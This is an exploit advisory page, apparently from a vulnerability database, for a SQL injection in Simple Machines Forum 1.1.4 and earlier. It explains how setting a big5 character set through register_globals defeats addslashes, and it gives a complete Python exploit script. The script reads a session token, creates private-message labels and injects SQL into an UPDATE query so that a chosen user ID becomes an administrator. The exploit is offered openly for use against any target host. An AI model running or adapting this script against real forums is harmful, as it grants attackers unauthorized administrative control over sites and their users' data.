Simple Machines Forum <= 1.1.4 Remote SQL Injection Exploit

2009-04-23 / 2009-04-24
Credit: Paradox
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/python """ #=================================================================================================# # ____ __________ __ ____ __ # # /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ # # | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ # # | | | \ | |/ \ \___| | /_____/ | || | # # |___|___| /\__| /______ /\___ >__| |___||__| # # \/\______| \/ \/ # #=================================================================================================# # This was a priv8 Exploit # #=================================================================================================# # Simple Machines Forum <= 1.1.4 # # Sql Injection Vulnerability # # Priviledge Escalation Exploit # #====================================#===========#====================================#===========# # Server Configuration Requirements # # Some Information # # #====================================# #====================================# # # # # # register_globals = 1 # Vendor: www.simplemachines.org # # # Author: The:Paradox # #================================================# Severity: N/A # # # # # You may find exploits updates and more # # # explanations on => # Proud To Be Italian. # # http://paradox.altervista.org # # # # # #====================================#===========#================================================# # Board Description # # #====================================# # # # # Simple Machines Forum - SMF in short - is a free, professional grade software package that # # allows you to set up your own online community within minutes. # # Its powerful custom made template engine puts you in full control of the lay-out of your # # message board and with our unique SSI - or Server Side Includes - function you can let your # # forum and your website interact with each other. # # SMF is written in the popular language PHP and uses a MySQL database. It is designed to provide # # you with all the features you need from a bulletin board while having an absolute minimal # # impact on the resources of the server. # # SMF is the next generation of forum software - and best of all it is and will always # # remain completely free! # # # #====================================#============================================================# # Proof Of Concept / Bug Explanation # # #====================================# # # This is a quite old exploit and it is inapplicable on 1.1.5 version and on last 2.0 pre-release # # (that's why I decided to public it). First, let's have a little poc. # #=================================================================================================# [Load.php] 148. if (isset($db_character_set) && preg_match('~^\w+$~', $db_character_set) === 1) 149. db_query(" 150. SET NAMES $db_character_set", __FILE__, __LINE__); #=================================================================================================# # In Load.php if $db_character_set is set Smf will execute a Set Names Sql Query. # # Directly from dev.mysql.com let's see what it means. # # # # "SET NAMES indicates what character set the client will use to send SQL statements to the # # the server. Thus, SET NAMES 'cp1251' tells the server future incoming messages from this client # # are in character set cp1251." # # # # Ok, now let's see what $db_character_set is. # # $db_character_set is a "Settings.php variable" written only if a "Non-Default tick" # # is checked during the installation process. # # The real vulnerability is when the "Non-Default tick" is left unchecked, Smf doesn't write # # it in "Settings.php" and no value is assigned to it: it's possible to set it # # via register_globals. # # # # Now the cool poc section =D # # Surely you saw that preg_match avoids any injection of non-alphanumerical chars in the query # # at line 150 in Load.php # # So, how is possible to take advantage of that? # # To understand this vulnerability you have to comprehend some character set presents multibyte # # characters and they may obiate addslashes() function. # # Addslashes simply adds a backslash (0x5c) before single quote ('), double quote ("), # # backslash (\) and NUL (the NULL byte), without checking if the added blackslash creates # # another char. # # No, i'm not going mad :P Here is an example: # # # # Bytes in Input # # 0xa327 # # # # Addslashes(Bytes in Input) # # 0xa35c27 # # # # In big5, but also in other multibyte charsets, 0xa35c is a valid char: 0x27 (') is left alone. # # Therefore a lot of smf's queries are vulnerable if $db_character_set is settable. # # In this exploit i will inject sql code in Update syntax, increasing user's privledges. # #=================================================================================================# # Exploit tested on 1.1.3 and 1.1.4 Smf's versions. # #=================================================================================================# # Use this exploit at your own risk. You are responsible for your own deeds. # #=================================================================================================# # Python Exploit Starts # #=================================================================================================# """ from sys import argv, exit from httplib import HTTPConnection from urllib import urlencode, unquote from time import sleep print """ #=================================================================# # Simple Machines Forum <= 1.1.4 # # Sql Injection Vulnerability # # Priviledge Escalation Exploit # # # # ###################################### # # # Let's get administrator rights!!! # # # ###################################### # # # # Discovered By The:Paradox # # # # Usage: # # ./Exploit [Target] [Path] [PHPSessID] [Userid] # # # # Example: # # ./Exploit 127.0.0.1 /SMF/ a574bfe34d95074dea69c00e38851722 9 # # ./Exploit www.host.com / 11efb3b6031bc79a8dd7526750c42119 36 # #=================================================================# """ if len(argv)<=4: exit() sn = "PHPSESSID" # Session cookie name. You may have to change this. port = 80 target = argv[1] path = argv[2] sv = argv[3] uid = argv[4] class killsmf: def __init__(self): print "[.] Exploit Starts." self.GetSesc() self.CreateLabels() self.Inject() print "[+] All done.\n Now user with ID_MEMBER " + uid + " should have administrator rights. \n -= Paradox Got This One =-" def GetSesc(self): print "[+] Trying to read Sesc" for i in range (0,2): conn = HTTPConnection(target,port) conn.request("GET", path + "index.php?action=pm;sa=manlabels;", {}, {"Accept": "text/plain","Cookie": sn + "=" + sv + ";"}) rsp = conn.getresponse() r = rsp.read() if rsp.status == 404: exit ("[-] Error 404. Not Found") elif r.find('<input type="hidden" name="sc" value="') != -1 and r.find('" />') != -1 : self.sesc = r.split('<input type="hidden" name="sc" value="')[1].split('" />')[0] if len(self.sesc) != 32: exit ("[-] Invalid Sesc") print "[+] Sesc has been successfully read ==> "+self.sesc else: exit ("[-] Unable to find Sesc") def CreateLabels(self): print "[+] Creating three labels..." for i in range (0,3): conn = HTTPConnection(target,port) conn.request("POST", path + "index.php?action=pm;sa=manlabels;sesc="+self.sesc, urlencode({"label" : i, "add" : "Add+New+Label"}), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded","Referer": "http://" + target + path + "/index.php?action=pm;sa=manlabels", "Cookie": sn + "=" + sv + ";"}) sleep(0.35) def Inject(self): print "[+] Sql code is going to be injected." conn = HTTPConnection(target,port) conn.request("POST", path + "index.php?debug;action=pm;sa=manlabels;sesc="+self.sesc, urlencode({"label_name[0]" : "o rly" + unquote("%a3%27"),"label_name[1]" : "ID_GROUP=1 WHERE/*", "label_name[2]" : "*/ID_MEMBER=" + uid + "/*", "save" : "Save", "sc" : self.sesc, "db_character_set": "big5"}), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded","Referer": "http://" + target + path + "/index.php?action=pm;sa=manlabels", "Cookie": sn + "=" + sv + ";"}) killsmf()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top